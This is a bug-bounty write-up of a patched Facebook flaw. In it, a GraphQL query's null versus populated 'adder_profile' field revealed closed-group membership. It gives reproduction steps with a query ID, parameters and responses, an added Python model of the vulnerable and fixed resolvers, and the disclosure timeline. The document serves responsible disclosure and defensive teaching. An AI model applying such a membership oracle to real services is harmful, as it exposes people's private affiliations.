A C

Published On: 01 Jun 2019

Determine members in a closed Facebook group

Privacy/Authentication
Facebook | iOS
---
HIGH VALID
Description

According to https://www.facebook.com/help/220336891328465, only current members can see the list of members of a closed group. This privacy control can be bypassed with a GraphQL API call: the response differs depending on whether the queried user is a member, so it is possible to infer whether a given user belongs to a closed group.

Impact

This bug could have allowed an attacker to determine the members of a closed group without being a member.




Reproduction Steps

Step 1

HTTP POST

https://graph.facebook.com/graphql/

query_id = 2433256830023894

query_params = {"4":UserID,"11":GroupID}

Step 2

Fire the call with UserID set to a MemberID (a user who is a member of the group).

Response

"adder_profile": {
  "__typename": "User",
  "name": "1",
  "id": "1",
  "profile_picture": {
    "uri": "1"
  }
}

Step 3

Fire the call with UserID set to a Non-MemberID (a user who is not a member of the group).

Response

"adder_profile": null

Step 4

As the two responses show, whether "adder_profile" is populated or null is an indicator of group membership.
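The defect behind this oracle is an authorization check performed on the wrong principal: the resolver decides whether to populate "adder_profile" based on the queried user's membership, without first checking that the requester is allowed to see the group's members at all. The following Python model is an added illustration, not Facebook's code; the group store, the resolver signatures and the user and group IDs are constructed. It places a vulnerable resolver beside a hardened one, and includes the indistinguishability check a reviewer would apply to any field gated on group privacy.

```python
"""Model of a membership oracle in a privacy-gated resolver, with the fix.

Added illustration only (not Facebook's code). GROUPS, the resolver
signatures and all IDs are constructed for this example.
"""

from dataclasses import dataclass, field

@dataclass
class Group:
    group_id: str
    members: set = field(default_factory=set)

# Constructed sample data: one closed group with two members.
GROUPS = {
    "g1": Group("g1", {"alice", "bob"}),
}

def resolve_adder_profile_vulnerable(requester, user_id, group_id):
    """Vulnerable shape: only the *target* user's membership is consulted.

    The requester's own right to see the member list is never checked, so
    the null / non-null response tells any caller whether user_id is in
    the group. This reproduces the behaviour described in the report.
    """
    group = GROUPS.get(group_id)
    if group is None or user_id not in group.members:
        return None
    return {"__typename": "User", "id": user_id, "name": user_id}

def resolve_adder_profile_fixed(requester, user_id, group_id):
    """Hardened shape: authorize the requester before looking at the target.

    "Requester may not view members" and "target is not a member" both
    return the same null value, so an outsider sees an identical response
    for every user_id and the membership signal is removed. A current
    member still gets the populated profile, matching the stated policy.
    """
    group = GROUPS.get(group_id)
    if group is None or requester not in group.members:
        return None            # not authorized: same response as "not a member"
    if user_id not in group.members:
        return None
    return {"__typename": "User", "id": user_id, "name": user_id}

def is_membership_oracle(resolver, requester, group_id, member, non_member):
    """True when `requester` can distinguish a member from a non-member by
    comparing the resolver's responses. For a requester who is not in the
    group this must be False, or the field leaks membership."""
    a = resolver(requester, member, group_id)
    b = resolver(requester, non_member, group_id)
    return a != b

if __name__ == "__main__":
    # "mallory" is constructed as an outsider, "carol" as a non-member target.
    print("vulnerable leaks:", is_membership_oracle(
        resolve_adder_profile_vulnerable, "mallory", "g1", "alice", "carol"))
    print("fixed leaks:     ", is_membership_oracle(
        resolve_adder_profile_fixed, "mallory", "g1", "alice", "carol"))
```

The same check generalizes to any field whose visibility depends on a privacy setting: pick a principal who should be denied, query once for an in-set value and once for an out-of-set value, and require the two responses to be byte-for-byte identical (status, body and error shape alike), since any difference is an oracle.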



Timeline

A, 01 May 2019: Initial Report

Facebook, 04 May 2019: Need more information

A, 04 May 2019: Sending additional information

Facebook, 08 May 2019: Pre-triage. "Hi Richard, Thank you for your submission. We've managed to reproduce your report and will get back to you once we have had a chance to investi ..."

Facebook, 09 May 2019: Triaged. "Hi Richard, Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will ..."

Facebook, 18 May 2019: Fixed. "Hi Richard, We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch ..."

A, 18 May 2019: Confirmation

Facebook, 19 May 2019: Bounty Awarded. "Hi Richard Cao, After reviewing this issue, we have decided to award you a bounty of $5000. Below is an explanation of the bounty amount. Facebo ..."
